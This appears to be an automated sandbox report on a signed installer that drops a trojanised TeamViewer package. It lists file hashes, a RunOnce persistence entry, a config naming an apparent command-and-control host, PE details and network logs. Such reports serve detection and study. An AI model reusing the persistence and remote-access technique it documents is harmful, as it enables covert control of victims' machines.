                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, wuapihost.exe
                                                                                                                      • Excluded IPs from analysis (whitelisted): 20.82.209.183, 8.238.85.254, 8.248.147.254, 8.248.137.254, 8.248.113.254, 8.248.139.254, 209.197.3.8, 20.54.110.249, 40.112.88.60, 23.216.77.209, 23.216.77.208, 23.35.236.56, 20.82.210.154
                                                                                                                      • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fg.download.windowsupdate.com.c.footprint.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, cds.d2s7q6s2.hwcdn.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed, report is missing behavior information
                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                      Simulations

                                                                                                                      Behavior and APIs

Time | Type | Description
14:08:02 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce TeamViewer.exe "C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe" f
14:08:10 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce TeamViewer.exe "C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe" f
14:08:49 | API Interceptor | 1x Sleep call for process: svchost.exe modified

                                                                                                                      Joe Sandbox View / Context

                                                                                                                      IPs

                                                                                                                      No context

                                                                                                                      Domains

                                                                                                                      No context

                                                                                                                      ASN

                                                                                                                      No context

                                                                                                                      JA3 Fingerprints

                                                                                                                      No context

                                                                                                                      Dropped Files

                                                                                                                      No context

                                                                                                                      Created / dropped Files

                                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):4096
                                                                                                                      Entropy (8bit):0.5972165353381301
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:0FE0k1GaD0JOCEfMuaaD0JOCEfMKQmDtS/tAl/gz2cE0fMbhEZolrRSQ2hyYIIT:0EGaD0JcaaD0JwQQ0tAg/0bjSQJ
                                                                                                                      MD5:D8D0D663F77B6A59418CC83E759489A3
                                                                                                                      SHA1:E184E188992F47890C2131012D10A617326571C6
                                                                                                                      SHA-256:EC7D75FCEB2CE0CE633F11864BE12F44AEF5FF24A105F6E20391247E1F683D2A
                                                                                                                      SHA-512:77C91200DF1C5F1B8EACBDFDFEA5FA14274194CDDFC71C4ED88B4A5E1779E9857D61A65EC783179F5D3C66F37568CF3A16E8DA4BBD7FCEDF79ECA1B9597441AA
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                      File Type:Extensible storage user DataBase, version 0x620, checksum 0x3816929a, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):32768
                                                                                                                      Entropy (8bit):0.0970600410052794
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:6zwl/+aeXRIE11Y8TRXaNUgQKEzwl/+aeXRIE11Y8TRXaNUgQK:60+aeXO4blaegQKE0+aeXO4blaegQK
                                                                                                                      MD5:7891AF17428A431A98339B1F99EACACA
                                                                                                                      SHA1:F7CD13538D809FCBF1C53EE9DD7328229DE4CC1F
                                                                                                                      SHA-256:3D3634BEBE4D54F66B45287CF4B2AF761E3D3A4322217FB79DB7324BA4336776
                                                                                                                      SHA-512:7C465D3AF93572748353A64A5A10DE8D81A477F2BC81A3B4CF5E36327B913D76DA649304D4260948553DAF01E9C952938815BB2E67A5DDCF68E02D548BE3740C
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):8192
                                                                                                                      Entropy (8bit):0.11169102851775213
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:y9EvUCNXAl/bJdAtiif98Ball:yYUUXAt4i0
                                                                                                                      MD5:C6E7F438F2544EE49F946C530D05A73A
                                                                                                                      SHA1:138A4F1DDB20ACD9C683F96E1DE5632ECEE87400
                                                                                                                      SHA-256:6C4844ACB817093DA3055F0924DADF4BCC069E3EA8E45B69D9130F3480C62DB3
                                                                                                                      SHA-512:05F321F15CE0A76F389D0317C25597BEE96962E1445208C54766BCAB3D609C8AAEB965173CF7F228DA3A67894049C67FE0015E46B7E4B13D0BA3505FBDF8C1D4
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      C:\Users\user\AppData\Local\Temp\nso5B2F.tmp
                                                                                                                      Process:C:\Users\user\Desktop\77Etc0bR2v.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):5132919
                                                                                                                      Entropy (8bit):6.737705896318464
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:98304:FjdgHPmMogx1WZRkPapqj+ZG/D+AKbS5ZmfzCAW6LcTjH:tqHuMogsRkyq0umfzCgi
                                                                                                                      MD5:E29F152B606F9669680D7CB24308991A
                                                                                                                      SHA1:680CC154C050B90FEA35AD0FDB97E387D62B7740
                                                                                                                      SHA-256:FF1A9205BD8076DE3811E5417AC2AEAC44D940F392B19C9D8A2833493CC8034F
                                                                                                                      SHA-512:C33DB997837A716A0F09E0E40C61D92BADFAF2A440C8EBB5BAB9F156A2CC61E91DBF7CC748D074F7743E336F93080D4BDABBC14483A23036EC68C9DDEDC40DF5
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      C:\Users\user\AppData\Roaming\TeamViewer\TV.dll
                                                                                                                      Process:C:\Users\user\Desktop\77Etc0bR2v.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):75256
                                                                                                                      Entropy (8bit):6.743019659267088
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:coaayOa9Z58qTGIT0XhZKfl2MjEzHPggfLD//qQmoz:p1uZ58qTGITey4zJfLD3qQmC
                                                                                                                      MD5:A44F2649C82B35D42E6036D1C75E48C4
                                                                                                                      SHA1:EE3B00701C97ED107B78ECBDF9D962F1508EDC8E
                                                                                                                      SHA-256:760945429F7EA52C40C75A0FA0424D943E317EC48575C812545CC2C4BE5B0510
                                                                                                                      SHA-512:B8340F06E3446AA91F435F4009557830BBC8E8279321F41198C076E8202869B98C156809CF3FAD8F900B569ACA2AB6B6A7725A1532E2846B31EDEC513E84734D
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 27%
                                                                                                                      Reputation:unknown
                                                                                                                      C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      Process:C:\Users\user\Desktop\77Etc0bR2v.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):4375848
                                                                                                                      Entropy (8bit):6.621789733656387
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:98304:6jdgHPmMogx1WZRkPapqj+ZG/D+AKbS5m:4qHuMogsRkyq0N
                                                                                                                      MD5:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                      SHA1:A3A7498F02BAB188B3944382BBA4D016D63607D1
                                                                                                                      SHA-256:D2CDCA8EFA27089D3DEAD0CCEAFBE470B3815C9C2A362C007D1F516E5379AC92
                                                                                                                      SHA-512:412B42C540A9FE41709453D725B7A1E888849326A70A411E645F29240D730D69EBCF4B26E6870D33E0A395C612470BD00064025D22B0C6BCD211242E8EF6CEA6
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Reputation:unknown
                                                                                                                      C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.ini
                                                                                                                      Process:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      File Type:data
                                                                                                                      Category:modified
                                                                                                                      Size (bytes):272
                                                                                                                      Entropy (8bit):3.256847641939824
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:cAeYlA3m7D5KTsYKdyp3cQYKDClRAeYlA3m7D5KLp3gk+AeYlA3m7D5KLp3gkp:z7NzdyTmlM7NM397NM3p
                                                                                                                      MD5:64D2D142BE53943D72355DE71619BB22
                                                                                                                      SHA1:D48EC103950F4A66E7774915D6FC36CCA5240D18
                                                                                                                      SHA-256:09F60A98FEC98F6D8E7CC9421FDE08B7B34E6385FA7EC871D19BD640EE7FC881
                                                                                                                      SHA-512:26F508C945EB69D41494A5B53B16BDFCE738606A49F7D2738839FA83ED59700149739EE089F3EEB74C2F4832414B4BBFB0D46F6321EB27BAAD27E8D226B80090
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o.....h.p.n.=./.u.p.d.a.t.e./.....h.s.n.=.1.....h.t.=.6...../.B.8.C.6.3.1.A.8./.....h.s.n.=.1.....h.t.=.6.....1.3.6.....r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.
                                                                                                                      C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dll
                                                                                                                      Process:C:\Users\user\Desktop\77Etc0bR2v.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):607528
                                                                                                                      Entropy (8bit):6.564133582926054
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:r5hmfFy7ZJ0uUCAD06v7JlHZctms+2lifZ0iMe8d6YySkYQKMDqtAu3NhgGy6wSP:Vhmf4ACAzneosEi6YhvAuUGyUrNJbL
                                                                                                                      MD5:554EE592B125CFDF81B376B5C24AA61C
                                                                                                                      SHA1:666D2C04171246734575D4453289AA2D9AF93B97
                                                                                                                      SHA-256:B296EF421D5B7F569E623D41A42D87A064C4358CFA89A192988F854929E3ABD1
                                                                                                                      SHA-512:6C3111BF9D26929D426797EBDD8D804B34E2E8F593BF488298E70964538F2DA3D971C4ED3C3237C829AE7DE4FDB8D4316D84F153E93E3788808547A8538B73F5
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Reputation:unknown
                                                                                                                      C:\Users\user\AppData\Roaming\TeamViewer\vpn.cab
                                                                                                                      Process:C:\Users\user\Desktop\77Etc0bR2v.exe
                                                                                                                      File Type:Microsoft Cabinet archive data, 71196 bytes, 8 files
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):71196
                                                                                                                      Entropy (8bit):7.996182851828797
                                                                                                                      Encrypted:true
                                                                                                                      SSDEEP:1536:qUTRtkxXFuG1DKNYCqRBiFxMZPQCJh/njgG5+jC5hA101pNO0:qUNtax12mCqRBiyQG/jgG5+j2NO0
                                                                                                                      MD5:8A84AA1B9F20DC194947D7AC592D818E
                                                                                                                      SHA1:4A77AB0D59F39BF600BB89D9121446F6AA2D139B
                                                                                                                      SHA-256:8A740BE5D92B734E77B210354988DFD49F31C49814240513CF4B0353A8CE6DFB
                                                                                                                      SHA-512:B3F90ADB48861CD775F15E75885C81A130D62DFE429A5833FA1CE0BC203EEA15BD8A7306618B1F4D27810493300400C8B149D58032F90F0E9D93B04F9B8F1050
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MSCF cabinet header listing 64\teamviewervpn.cat, 64\TeamViewerVPN.inf, 64\teamviewervpn.sys, 64\install.exe, 86\teamviewervpn.cat, 86\TeamViewerVPN.inf, 86\teamviewervpn.sys, 86\install.exe
                                                                                                                      C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):55
                                                                                                                      Entropy (8bit):4.306461250274409
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                      Static File Info

                                                                                                                      General

                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Entropy (8bit):7.973639636653341
                                                                                                                      TrID:
                                                                                                                      • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                                                      • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                      File name:77Etc0bR2v.exe
                                                                                                                      File size:1828192
                                                                                                                      MD5:e71e3b995477081569ed357e4d403666
                                                                                                                      SHA1:809c4cc4ae51fcf3eca24e7d7fa5c1b6b5db52ce
                                                                                                                      SHA256:94b9abbe10bd9d6abcb8dce27814992bf7a09ed416c66998bd3496bda1490713
                                                                                                                      SHA512:2dca79011e40164672f7d81ed42fa9f080bca7148e451a0bf94c6bf0f6381e6eb8ee1bc3bac14e690304410a43f46994bfae76ee7d8ee2785ffaecb02f9ebd3b
                                                                                                                      SSDEEP:49152:OBGHLrZP7auvm8sJEkbxH0ulBuw8ZtTUZEoH+hE:vrdTauvkERulBaUZEoH+h

                                                                                                                      File Icon

                                                                                                                      Icon Hash:c403939c989380c8

                                                                                                                      Static PE Info

                                                                                                                      General

                                                                                                                      Entrypoint:0x40323c
                                                                                                                      Entrypoint Section:.text
                                                                                                                      Digitally signed:true
                                                                                                                      Imagebase:0x400000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                      Time Stamp:0x4A2AE2A2 [Sat Jun 6 21:41:54 2009 UTC]
                                                                                                                      TLS Callbacks:
                                                                                                                      CLR (.Net) Version:
                                                                                                                      OS Version Major:4
                                                                                                                      OS Version Minor:0
                                                                                                                      File Version Major:4
                                                                                                                      File Version Minor:0
                                                                                                                      Subsystem Version Major:4
                                                                                                                      Subsystem Version Minor:0
                                                                                                                      Import Hash:5bd07784f328e868356a895d4ab1a505

                                                                                                                      Authenticode Signature

                                                                                                                      Signature Valid:true
                                                                                                                      Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
                                                                                                                      Signature Validation Error:The operation completed successfully
                                                                                                                      Error Number:0
                                                                                                                      Not Before, Not After
                                                                                                                      • 6/3/2021 5:00:00 PM 6/4/2022 4:59:59 PM
                                                                                                                      Subject Chain
                                                                                                                      • CN=Hartex LLC, O=Hartex LLC, L=Moscow, C=RU
                                                                                                                      Version:3
                                                                                                                      Thumbprint MD5:5D5CA7E8D78224799E8AA101FF486137
                                                                                                                      Thumbprint SHA-1:319517761E92EC6EEF1966A5994570D46A498093
                                                                                                                      Thumbprint SHA-256:AC50A5D91A71BA8447EE795FF966E625AEC004E49EB24ADAA366B988686B65A5
                                                                                                                      Serial:009B576882CCDB891FD6E4A66671F3AC71

                                                                                                                      Entrypoint Preview

                                                                                                                      Instruction
                                                                                                                      sub esp, 00000180h
                                                                                                                      push ebx
                                                                                                                      push ebp
                                                                                                                      push esi
                                                                                                                      xor ebx, ebx
                                                                                                                      push edi
                                                                                                                      mov dword ptr [esp+18h], ebx
                                                                                                                      mov dword ptr [esp+10h], 00409130h
                                                                                                                      xor esi, esi
                                                                                                                      mov byte ptr [esp+14h], 00000020h
                                                                                                                      call dword ptr [00407030h]
                                                                                                                      push 00008001h
                                                                                                                      call dword ptr [004070B4h]
                                                                                                                      push ebx
                                                                                                                      call dword ptr [0040727Ch]
                                                                                                                      push 00000008h
                                                                                                                      mov dword ptr [00423F58h], eax
                                                                                                                      call 00007F58B4E4EF2Eh
                                                                                                                      mov dword ptr [00423EA4h], eax
                                                                                                                      push ebx
                                                                                                                      lea eax, dword ptr [esp+34h]
                                                                                                                      push 00000160h
                                                                                                                      push eax
                                                                                                                      push ebx
                                                                                                                      push 0041F458h
                                                                                                                      call dword ptr [00407158h]
                                                                                                                      push 004091B8h
                                                                                                                      push 004236A0h
                                                                                                                      call 00007F58B4E4EBE1h
                                                                                                                      call dword ptr [004070B0h]
                                                                                                                      mov edi, 00429000h
                                                                                                                      push eax
                                                                                                                      push edi
                                                                                                                      call 00007F58B4E4EBCFh
                                                                                                                      push ebx
                                                                                                                      call dword ptr [0040710Ch]
                                                                                                                      cmp byte ptr [00429000h], 00000022h
                                                                                                                      mov dword ptr [00423EA0h], eax
                                                                                                                      mov eax, edi
                                                                                                                      jne 00007F58B4E4C32Ch
                                                                                                                      mov byte ptr [esp+14h], 00000022h
                                                                                                                      mov eax, 00429001h
                                                                                                                      push dword ptr [esp+14h]
                                                                                                                      push eax
                                                                                                                      call 00007F58B4E4E6C2h
                                                                                                                      push eax
                                                                                                                      call dword ptr [0040721Ch]
                                                                                                                      mov dword ptr [esp+1Ch], eax
                                                                                                                      jmp 00007F58B4E4C385h
                                                                                                                      cmp cl, 00000020h
                                                                                                                      jne 00007F58B4E4C328h
                                                                                                                      inc eax
                                                                                                                      cmp byte ptr [eax], 00000020h
                                                                                                                      je 00007F58B4E4C31Ch
                                                                                                                      cmp byte ptr [eax], 00000022h
                                                                                                                      mov byte ptr [eax+eax+00h], 00000000h

                                                                                                                      Rich Headers

                                                                                                                      Programming Language:
                                                                                                                      • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                      Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x73a4 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x44000 | 0xd628 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x1bbf68 | 0x25f8 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                                                                      Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5a5a | 0x5c00 | False | 0.660453464674 | data | 6.41769823686 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x1190 | 0x1200 | False | 0.375217013889 | SysEx File - | 4.24219639454 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x1af98 | 0x400 | False | 0.55859375 | data | 4.70902740305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x24000 | 0x20000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x44000 | 0xd628 | 0xd800 | False | 0.300600405093 | data | 5.06095919413 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                      Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x442e0 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 1056964862 | English | United States
RT_ICON | 0x48508 | 0x25a8 | data | English | United States
RT_ICON | 0x4aab0 | 0x2488 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
RT_ICON | 0x4cf38 | 0x1a68 | data | English | United States
RT_ICON | 0x4e9a0 | 0x10a8 | data | English | United States
RT_ICON | 0x4fa48 | 0x988 | data | English | United States
RT_ICON | 0x503d0 | 0x6b8 | data | English | United States
RT_ICON | 0x50a88 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_DIALOG | 0x50ef0 | 0x202 | data | English | United States
RT_DIALOG | 0x510f8 | 0xf8 | data | English | United States
RT_DIALOG | 0x511f0 | 0xee | data | English | United States
RT_GROUP_ICON | 0x512e0 | 0x76 | data | English | United States
RT_MANIFEST | 0x51358 | 0x2cc | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

                                                                                                                      Imports

DLL | Import
KERNEL32.DLL | CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
SHELL32.dll | SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
USER32.dll | EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                                                                      Possible Origin

Language of compilation system | Country where language is spoken | Map
English | United States |

                                                                                                                      Network Behavior

                                                                                                                      Network Port Distribution

                                                                                                                      TCP Packets

                                                                                                                      Sep 15, 2021 14:08:01.258640051 CEST8049755185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.258778095 CEST4975580192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.259424925 CEST4975580192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.282213926 CEST8049755185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.285140991 CEST4975580192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.287225962 CEST4975580192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.309426069 CEST8049755185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.314063072 CEST4975580192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.314114094 CEST4975580192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.335100889 CEST8049755185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.336735964 CEST8049755185.188.32.1192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.342247963 CEST4975580192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.342295885 CEST4975580192.168.2.6185.188.32.1
                                                                                                                      Sep 15, 2021 14:08:01.350913048 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.394808054 CEST804975637.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.395001888 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.395808935 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.435075998 CEST804975637.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.435647964 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.439027071 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.478888988 CEST804975737.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.489496946 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.495162010 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.495203018 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.542887926 CEST804975637.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.542922020 CEST804975737.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.544677973 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.544800043 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.584625006 CEST804975637.252.232.109192.168.2.6
